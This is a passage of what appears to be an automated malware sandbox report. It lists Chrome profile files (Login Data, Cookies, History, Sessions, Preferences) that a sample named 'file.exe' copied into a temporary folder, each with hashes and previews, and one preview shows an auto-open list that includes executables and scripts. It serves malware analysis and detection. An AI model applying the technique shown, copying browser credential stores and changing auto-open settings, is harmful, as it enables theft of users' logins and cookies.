            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
            Malicious:false
            Preview:.|.."....leveldb.BytewiseComparator......

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store\Encryption\CURRENT

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):16
            Entropy (8bit):3.2743974703476995
            Encrypted:false
            SSDEEP:3:1sjgWIV//Uv:1qIFUv
            MD5:46295CAC801E5D4857D09837238A6394
            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
            Malicious:false
            Preview:MANIFEST-000001.

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store\Encryption\LOG

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):338
            Entropy (8bit):5.194422150316388
            Encrypted:false
            SSDEEP:6:kubenPq2PcNwi23iKKdKWT5g1IdqIFUtjbenCZmwxbenukwOcNwi23iKKdKWT5gZ:kubAvLZ5Kkg5gSRFUtjbh/xb754Z5Kkn
            MD5:D1B41CB3C06483A653C3A586433D4D33
            SHA1:B60DA9AC4F86C3220E15C0669C89FF2603310BF8
            SHA-256:B2BDFC42B3E96153602162966FAEEBAC84DA674DE9CC7EE639E5BE2394B4A577
            SHA-512:0AADF171D976A9C9A330F2784080929181E30184044B7FFF811B0F46CB34099CAC099D5C91526F6D3DEC6473B6C773D90404F40E668E3917B9B6527F2CC542CE
            Malicious:false
            Preview:2023/10/05-08:42:23.048 25f0 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/MANIFEST-000001.2023/10/05-08:42:23.048 25f0 Recovering log #3.2023/10/05-08:42:23.048 25f0 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/000003.log .

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store\Encryption\LOG.old

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):297
            Entropy (8bit):5.239538279934225
            Encrypted:false
            SSDEEP:6:kuAUNF4M1cNwi23iKKdKWT5g1Iu2KLlTAGIq2PcNwi23iKKdKWT5g1IdqIFUv:kuAUF42Z5Kkg5gSiLxAGIvLZ5Kkg5gSS
            MD5:D0207D8334CFC8F8C297CE3DE5C9F99E
            SHA1:1FF5F1E768B70CE6F09B62DB89BB6E0CE026CECD
            SHA-256:F79537F7B45DCDA700BFBBEAC89B9338E0E07A80091D3318858A8B9D1DAB3C6A
            SHA-512:1907D0C9768722529CA0B3F6C47E18826FC86F81AA5CAE446DE4E8D5167AE553B38BD43E8B954186034D046CA8BEE125E043B2E219951E475AC122C46D04FA36
            Malicious:false
            Preview:2023/10/05-08:41:59.812 1cd4 Creating DB C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption since it was missing..2023/10/05-08:41:59.850 1cd4 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption/MANIFEST-000001.

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\GCM Store\Encryption\MANIFEST-000001

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:OpenPGP Secret Key
            Category:dropped
            Size (bytes):41
            Entropy (8bit):4.704993772857998
            Encrypted:false
            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
            Malicious:false
            Preview:.|.."....leveldb.BytewiseComparator......

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Google Profile.ico

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:MS Windows icon resource - 13 icons, 8x8, 32 bits/pixel, 10x10, 32 bits/pixel
            Category:dropped
            Size (bytes):197794
            Entropy (8bit):6.548294817785579
            Encrypted:false
            SSDEEP:3072:HXm/EXUfaL6MV8nbsFXdFVgQAU6v4v62PV2Ey28nr6dOQriQWe4g2rJBXCy9enoN:HXUMCm4U6q62MEBi99g6JVCvoZhhl+No
            MD5:EF36A84AD2BC23F79D171C604B56DE29
            SHA1:38D6569CD30D096140E752DB5D98D53CF304A8FC
            SHA-256:E9EECF02F444877E789D64C2290D6922BD42E2F2FE9C91A1381959ACD3292831
            SHA-512:DBB28281F8FA86D9084A0C3B3CDB6007C68AA038D8C28FE9B69AC0C1BE6DC2141CA1B2D6A444821E25ACE8E92FB35C37C89F8BCE5FEE33D6937E48B2759FA8BE
            Malicious:false
            Preview:............ .H............. ............... .p............. .h...n......... ............... ......... .... .....n...((.... .h.......00.... ..%..~H..@@.... .(B..&n..``.... .....N......... .(....D........ ......M..(............. .............................7...C.%.?...................@..,D.$.<...I.-.>.\............-H.(.B.....f....q.g...........H.".N.G....r...p....%.......N...>q.....}...s....-...$...H.k.(:..pv......r...'...1...''..1?..)9..5I..5P..(F..0F..)F.,....->.-7D.1=..1;..5>.,,......................................(............. .................................>..[A.".C..............W............?...F.$.>...5...*.9.................C.!TI.(.>...S.>......r.9..............XG.(.F.".V.@......S...P....-...........M.-.<.........V..q...p....F........."...R.#.6~M.......I..o#..q$...G.........)...Q.,.4W..;F.......N...L.....>...*...-...:e.X4B..'5..@Q..........@...)...3......T....0;.5D...;..!0..!/..-1..36..,$..............2>.W6D..7D..7D..4E..0F.[..........................

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\History

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):159744
            Entropy (8bit):0.5394293526345721
            Encrypted:false
            SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
            MD5:52701A76A821CDDBC23FB25C3FCA4968
            SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
            SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
            SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
            Malicious:false
            Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Login Data

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):40960
            Entropy (8bit):0.8553638852307782
            Encrypted:false
            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
            MD5:28222628A3465C5F0D4B28F70F97F482
            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Login Data For Account

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
            Category:dropped
            Size (bytes):40960
            Entropy (8bit):0.8553638852307782
            Encrypted:false
            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
            MD5:28222628A3465C5F0D4B28F70F97F482
            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Network Action Predictor

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 11, cookie 0x6, schema 4, UTF-8, version-valid-for 3
            Category:dropped
            Size (bytes):45056
            Entropy (8bit):0.40293591932113104
            Encrypted:false
            SSDEEP:24:TLVgTjDk5Yk8k+/kCkzD3zzbLGfIzLihje90xq/WMFFfeFzfXVVlYWOT/CUFSe:Tmo9n+8dv/qALihje9kqL42WOT/9F
            MD5:ADC0CFB8A1A20DE2C4AB738B413CBEA4
            SHA1:238EF489E5FDC6EBB36F09D415FB353350E7097B
            SHA-256:7C071E36A64FB1881258712C9880F155D9CBAC693BADCC391A1CB110C257CC37
            SHA-512:38C8B7293B8F7BEF03299BAFB981EEEE309945B1BDE26ACDAD6FDD63247C21CA04D493A1DDAFC3B9A1904EFED998E9C7C0C8E98506FD4AC0AB252DFF34566B66
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j.......=......\.t.+.>...,...=........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Network\Cookies

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
            Category:dropped
            Size (bytes):20480
            Entropy (8bit):0.848598812124929
            Encrypted:false
            SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
            MD5:9664DAA86F8917816B588C715D97BE07
            SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
            SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
            SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Network\Network Persistent State

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):2007
            Entropy (8bit):5.2516514012391085
            Encrypted:false
            SSDEEP:48:YXsXftsKfgCzs31sR0zsTVfuHNKsg+HIsPFz4YhbyDF:vfhfkObQ84N1hy
            MD5:3B98E883FE24503412BB454352A2DD68
            SHA1:0F08656DE7554E1ED1CEC75D5682870E6B8F9D51
            SHA-256:CE53900EEF550B942F1EC2B9F1FC5CF5E634F5883F095DE7633FA8A7475486D8
            SHA-512:53B26A5813965427B03B2F391832C02D72A9E45DB38547BCBEA45809A02E847AD63A8D6C748B3738165B2908625AFFDDC8DA64525337C839BE59DB72A5A71682
            Malicious:false
            Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557341455086","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557344325466","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557344360994","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://chrome.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557346257748","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL3VwZGF0ZS5nb29nbGVhcGlzLmNvbQAAAA==",false],"server

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Network\Reporting and NEL

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 5
            Category:dropped
            Size (bytes):36864
            Entropy (8bit):0.8409686518312441
            Encrypted:false
            SSDEEP:48:TKIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBlKz:eIEumQv8m1ccnvS6lK
            MD5:066C47896BA50F8DCC30DCFF791F7970
            SHA1:CC57FEDC08A7262E55A78F58EF569172F8DCF95F
            SHA-256:0AA8291B0F8045A50A15475D1EAE46C5249952B0AB1BCE3CB392073CAE216817
            SHA-512:8E93906548518463DDB3EE0A2AE9A9F37827F00CE587DCF503265BD5E76210BAD5EEE46EF3A4D31E98E64A4F68C582DE2267D343D45D0E0851BB2F8C2DA0E4C9
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Network\TransportSecurity

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):355
            Entropy (8bit):5.478091947597365
            Encrypted:false
            SSDEEP:6:YWyWNvxzhNnV2bj8wXwlmUUAnIMOXdXhONhSDKWlBv31dB8wXwlmUUAnIMp5jA9/:YWy+NnYj+UAnI9dRFDBR7N+UAnI6A9qw
            MD5:51682A45877FEB21C2B0AF5FBAB62379
            SHA1:0BDBE5D09073CDEBD6D8623DFAC5E9F8EAECC030
            SHA-256:A10AAF981E3EC2552A55EB912C889C716C82E383D5EDE69B97700D9B8DF70057
            SHA-512:A77E78AC1ECB60257FB6CF7AB5F3E66C2A73CFFB660E9EC95B01CDD5049BB2CEA2D8E7E8CC3B4FC031395BB5DA71CD09285222D81340DFC1006668DE0603572E
            Malicious:false
            Preview:{"sts":[{"expiry":1728027741.976549,"host":"5EdUoB7YUY9zZV+2DkgVXgho8WUvp+D+6KpeUOhNQIM=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1696491741.976551},{"expiry":1728028313.74421,"host":"8/RrMmQlCD2Gsp14wUCE1P8r7B2C5+yE0+g79IPyRsc=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696492313.744215}],"version":2}

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Network\Trust Tokens

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
            Category:dropped
            Size (bytes):36864
            Entropy (8bit):0.3886039372934488
            Encrypted:false
            SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
            MD5:DEA619BA33775B1BAEEC7B32110CB3BD
            SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
            SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
            SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Preferences

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):9335
            Entropy (8bit):5.27624379017732
            Encrypted:false
            SSDEEP:192:lZqGmdAV57aJrHAEDU+V+FpKXFbbNtZCEXqT04rO:lUjdqcZD3Gpq/tZpXqT04C
            MD5:1992E740D826592865313682E5C3A392
            SHA1:C93D1202A2EB17BF78D5C619D135E33FC468F5F5
            SHA-256:49FE82E24E125CF4798740F45F7D325AF446509615F3BF9AB8E2653E2206994A
            SHA-512:DAFBE93B0A42799A080A33B922666B4DBD9A17C85C571E1162F20F4C4E417BB0085D01138F1E158E77A5D07CDCB9F0897F42FBD14D9A6638FC30822E47BAF1E6
            Malicious:false
            Preview:{"NewTabPage":{"PrevNavigationTime":"13340965340571520"},"account_tracker_service_last_update":"13340965311068969","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13340965310875286","apps":{"shortcuts_arch":"","shortcuts_version":0},"autocomplete":{"retention_policy_last_version":117},"browser":{"has_seen_welcome_page":true,"should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"commerce_daily_metrics_last_update_time":"13340965894528465","countryid_at_install":17224,"default_apps_install_state":3,"dips_timer_last_update":"13340965310976738","domain_diversity":{"last_reporting_timestamp":"13340965311068532"},"download":{"directory_upgrade":true,"always_open_pdf_externally":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\PreferredApps

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):33
            Entropy (8bit):4.051821770808046
            Encrypted:false
            SSDEEP:3:YVXADAEvTLSJ:Y9AcEvHSJ
            MD5:2B432FEF211C69C745ACA86DE4F8E4AB
            SHA1:4B92DA8D4C0188CF2409500ADCD2200444A82FCC
            SHA-256:42B55D126D1E640B1ED7A6BDCB9A46C81DF461FA7E131F4F8C7108C2C61C14DE
            SHA-512:948502DE4DC89A7E9D2E1660451FCD0F44FD3816072924A44F145D821D0363233CC92A377DBA3A0A9F849E3C17B1893070025C369C8120083A622D025FE1EACF
            Malicious:false
            Preview:{"preferred_apps":[],"version":1}

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\PrivateAggregation

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 2
            Category:dropped
            Size (bytes):20480
            Entropy (8bit):0.3494502770750662
            Encrypted:false
            SSDEEP:12:TLyKjXWhNOUhhQvbKL2LzKFxOUwa5qguWfpbZ75fOS:TLhjXWjD20wzK6UwccWfp15fB
            MD5:92A8445F953152A4A4CDD1477CC1A372
            SHA1:44F52B73D6BFB593F153DB7376F768AB8FEFFB53
            SHA-256:E31AB956F376013575B8FC9E06ED294E9EE0851DAA6DDF68B8407458A812DD5F
            SHA-512:17DD96B4635C4E26D0A1738B8B267176AD2911B7491082C49DAF0A1490A9D59D1E2899755CB6611D3A3CB5E4A193C08086D1FEBFB576C13D9ECD6096F22F9E68
            Malicious:false
            Preview:SQLite format 3......@ ..........................................................................j.......d..g...d......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Secure Preferences

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):13856
            Entropy (8bit):5.565392460990894
            Encrypted:false
            SSDEEP:384:xVknXBx1kXqKf/pUZNCgVLH2HfCdIrUobHGeB3P:xmXBx1kXqKf/pUZNCgVLH2Hf+IrUorGK
            MD5:F456AA37B0B6C7034DB3FF0AB17F2936
            SHA1:6BA1314A2AEE9CEC912D0891E19E40DBF6C32BAA
            SHA-256:BBD1BFD54F0F3D2EA7F5D34BFB9368438623F3AD78D811790B9F1942C45F9FD3
            SHA-512:FF5791AF4ABE154A221651D05CB6E8A28EB7A41FC1B7694AD920114F307F0196238FED25427475DC6AEA69A668AC450427A6BB99295390BA2E6B6318CC712026
            Malicious:false
            Preview:{"download":{"directory_upgrade":true,"always_open_pdf_externally":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz:msi"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13340965310875704","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13340965310875704","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, e

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Session Storage\000003.log

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:data
            Category:dropped
            Size (bytes):213
            Entropy (8bit):2.7541301583060975
            Encrypted:false
            SSDEEP:3:S8ltHlS+QUl1ASEGhTFljljljljljljljljl:S85aEFljljljljljljljljl
            MD5:046CC08D163FC4578CD1B77A5D0965AC
            SHA1:92F503E605C30974BAF385F1619F1269B81DEC57
            SHA-256:693A60684AA9FF4F01CB6027E9C938F4701C0C898AFC224A0776CB1E18E87166
            SHA-512:E8B1DF36A237BCBBAD897146CA247EDF75466B2A4030FEC620C46932B5C31137F2931CD2758534E4308AED3FB9CC40EDF2D7646A38530BCC5E6D7069C19A3B1F
            Malicious:false
            Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f...............

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Session Storage\CURRENT

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):16
            Entropy (8bit):3.2743974703476995
            Encrypted:false
            SSDEEP:3:1sjgWIV//Uv:1qIFUv
            MD5:46295CAC801E5D4857D09837238A6394
            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
            Malicious:false
            Preview:MANIFEST-000001.

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Session Storage\LOG

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):328
            Entropy (8bit):5.119605227789069
            Encrypted:false
            SSDEEP:6:kub+VNAVq2PcNwi23iKKdKrQMxIFUtjb+VNAgZmwxbM6NAIkwOcNwi23iKKdKrQq:kubqNAVvLZ5KkCFUtjbqNAg/xbFAI54Z
            MD5:59D8C03890F20F7CEDE1544C18951B93
            SHA1:2D2618987E460284E06644C379447FBB595873CC
            SHA-256:53D8C647B1C9BA33BF7D426740BFA5CDACEA3694B5179B18087116391C2D30ED
            SHA-512:CA8DF4001B00A6EEA065443FCD864CF2133E5FD6836C0B596130ECA3422918952A867DCC6B5AE9805EC09C8C01258248E088EC43AD777F5671AC5A7717CFBD3D
            Malicious:false
            Preview:2023/10/05-08:42:20.628 2830 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/MANIFEST-000001.2023/10/05-08:42:20.628 2830 Recovering log #3.2023/10/05-08:42:20.630 2830 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/000003.log .

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Session Storage\LOG.old

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):328
            Entropy (8bit):5.213921765183054
            Encrypted:false
            SSDEEP:6:kuM2+q2PcNwi23iKKdKrQMxIFUtjM3ZmwxMo3VkwOcNwi23iKKdKrQMFLJ:kuM3vLZ5KkCFUtjM3/xMoF54Z5KktJ
            MD5:91E8A6F2463AEDA2BF0C6FE22B692A06
            SHA1:0A68B9F005541E31EDFC1150F183B4E7BE19311F
            SHA-256:53607FF4C92044441DD6FDE498DE12057043DA81E0329D8F1812EA383068960D
            SHA-512:EDD7982555EB65972026C64D2E7F31135183599C4F3693EAC48A166D38A1B4E967DA6732F910B8679A8DF2FC705A6765617B2BFD73BE8F478E8D0BC38B320FC3
            Malicious:false
            Preview:2023/10/05-08:41:55.573 1b78 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/MANIFEST-000001.2023/10/05-08:41:55.574 1b78 Recovering log #3.2023/10/05-08:41:55.575 1b78 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage/000003.log .

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Session Storage\MANIFEST-000001

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:OpenPGP Secret Key
            Category:dropped
            Size (bytes):41
            Entropy (8bit):4.704993772857998
            Encrypted:false
            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
            Malicious:false
            Preview:.|.."....leveldb.BytewiseComparator......

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sessions\Session_13340965317813669

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:data
            Category:dropped
            Size (bytes):2678
            Entropy (8bit):3.1114451652459114
            Encrypted:false
            SSDEEP:24:3Zl+L5w9ulifloLligUlEAEgvnlia5nH0VgXXxDkd95d2nuCCVBJT55:3Zl+69gisigUlqwiEnH0C1kd9TUu5lD
            MD5:223D6FD3E24E9F2A77A3791E3C7056ED
            SHA1:1E14C7483555223534F4A70EC861502BCAB04CF9
            SHA-256:A9259CD6402BC6F91F03966B238602C8D07331F565D8052B809D9E4B42BA41CF
            SHA-512:D2AA2FAAEC5A1F86BB37192E09810D3028ACFB4C1CF7178F18E17F8C705C91967A90B2D9FF3C10D83F42AB9DC7C8B924713FC8DB3BDDDE303643114225F60AE4
            Malicious:false
            Preview:SNSS..........H..............H..............H...... ...H..........H..........H....!.....H..................................H...H1..,......H$...1e05142b_c25e_4073_8449_2828bdea3287......H..........H.......[..........H......H....5..0......H&...{B47FAB60-AE2E-44B3-B8D1-B905DCF5A78F}.... ...H..........H....................1..,......H........chrome://newtab/....N.e.w. .T.a.b...........!........................................................................................................s.B.....s.B............................@.......................................................4.......c.h.r.o.m.e.:././.n.e.w.-.t.a.b.-.p.a.g.e./.....................................8.......0.......8....................................................................... ...............................................................................................8...............0........s.B.....s.B....p.......................................................@...............................a.b.o.u.t.:.b.l.a

            C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Sessions\Session_13340965342984957

            Download File
            Process:C:\Users\user\Desktop\file.exe
            File Type:data
            Category:dropped
            Size (bytes):2793
            Entropy (8bit):3.171076067185925
